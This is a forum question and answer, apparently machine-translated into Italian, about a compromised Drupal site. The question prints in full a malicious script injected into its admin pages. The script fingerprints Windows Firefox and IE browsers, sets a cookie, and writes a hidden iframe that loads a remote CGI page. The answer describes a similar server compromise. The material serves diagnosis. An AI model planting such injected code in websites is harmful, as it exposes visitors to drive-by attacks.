Perché lo script "103fm" viene visualizzato sul sito Web Drupal?

Question

Eventuali duplicati:
Weird Script Appearing In My Website's DOM

Ho appena notato uno script in esecuzione strano nel mio siti web DOM. Sto eseguendo DRUPAL. Lo script è http://www.103fm.net/release.js. Non so da dove iniziare a cercare questo script canaglia. Il mio sito web è miloads.com e succede solo nei menu di amministrazione. La cosa strana è il file non esiste sul 103fm.net, ma in realtà carica il seguente script:

var BrowserDetect = { 
init: function() { 
this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; 
this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; 
this.OS = this.searchString(this.dataOS) || "an unknown OS"; 
}, 
searchString: function(data) { 
for (var i = 0; i < data.length; i++) { 
var dataString = data[i].string; 
var dataProp = data[i].prop; 
this.versionSearchString = data[i].versionSearch || data[i].identity; 
if (dataString) { 
if (dataString.indexOf(data[i].subString) != -1) 
return data[i].identity; 
} else if (dataProp) 
return data[i].identity; 
} 
}, 
searchVersion: function(dataString) { 
var index = dataString.indexOf(this.versionSearchString); 
if (index == -1) 
return; 
return parseFloat(dataString.substring(index + this.versionSearchString.length + 1)); 
}, 
dataBrowser: [{ 
string: navigator.userAgent, 
subString: "Firefox", 
identity: "Firefox" 
}, { 
string: navigator.userAgent, 
subString: "MSIE", 
identity: "Explorer", 
versionSearch: "MSIE" 
}], 
dataOS: [{ 
string: navigator.platform, 
subString: "Win", 
identity: "Windows" 
}] 
}; 
function addCookie(szName, szValue, dtDaysExpires) { 
var dtExpires = new Date(); 
var dtExpiryDate = ""; 
dtExpires.setTime(dtExpires.getTime() + dtDaysExpires * 24 * 60 * 60 * 1000); 
dtExpiryDate = dtExpires.toGMTString(); 
document.cookie = szName + "=" + szValue + ";expires=" + dtExpiryDate; 
} 
function findCookie(szName) { 
var i = 0; 
var nStartPosition = 0; 
var nEndPosition = 0; 
var szCookieString = document.cookie; 
while (i <= szCookieString.length) { 
nStartPosition = i; 
nEndPosition = nStartPosition + szName.length; 
if (szCookieString.substring(nStartPosition, nEndPosition) == szName) { 
nStartPosition = nEndPosition + 1; 
nEndPosition = document.cookie.indexOf(";", nStartPosition); 
if (nEndPosition < nStartPosition) 
nEndPosition = document.cookie.length; 
return document.cookie.substring(nStartPosition, nEndPosition); 
break; 
} 
i++; 
} 
return ""; 
} 
BrowserDetect.init(); 
var szCookieString = document.cookie; 
var stopit = BrowserDetect.browser; 
var os = BrowserDetect.OS; 
if (((stopit == "Firefox" || stopit == "Explorer") && (os == "Windows")) && (findCookie('geo_id2') != '753445')) { 
addCookie("geo_id2", "753445", 1); 
document.write("<if" + "rame name='info' src='http://www.ztanalytics.com/stat.cgi?s_id=1' width=1 height=1 scrolling=no frameborder=0></if" + "rame>"); 
} else {} 

Answer 1

Allo stesso modo, il server del nostro cliente è stata compromessa la scorsa notte, da indirizzi IP in Romania, Repubblica Ceca e Polonia . Questi processi apparentemente automatizzati sembrano iniettare un tag script nella parte superiore del tag body. Questo script sembra generare un cookie su macchine Windows con Firefox e IE. Quindi apre un iframe ed esegue uno script CGI in esecuzione su un sito ospitato in Russia.

Fortunatamente, l'ultima versione di Firefox non caricherà nemmeno lo script; IE tuttavia.

Chrome (nonostante non sia interessato) non consente nemmeno di visitare la pagina in cui è successo.

Come tutti i rapporti che ho trovato di questo sono accaduti di recente, potrebbe benissimo essere un vunerability del software, piuttosto che password compromesse - quale server FTP stai correndo (connettiti al server con il tuo client FTP, e la console dovrebbe dirti). Il server in questione sta eseguendo ProFTPd 1.3.1.

Se il software è comune, i creatori devono essere informati.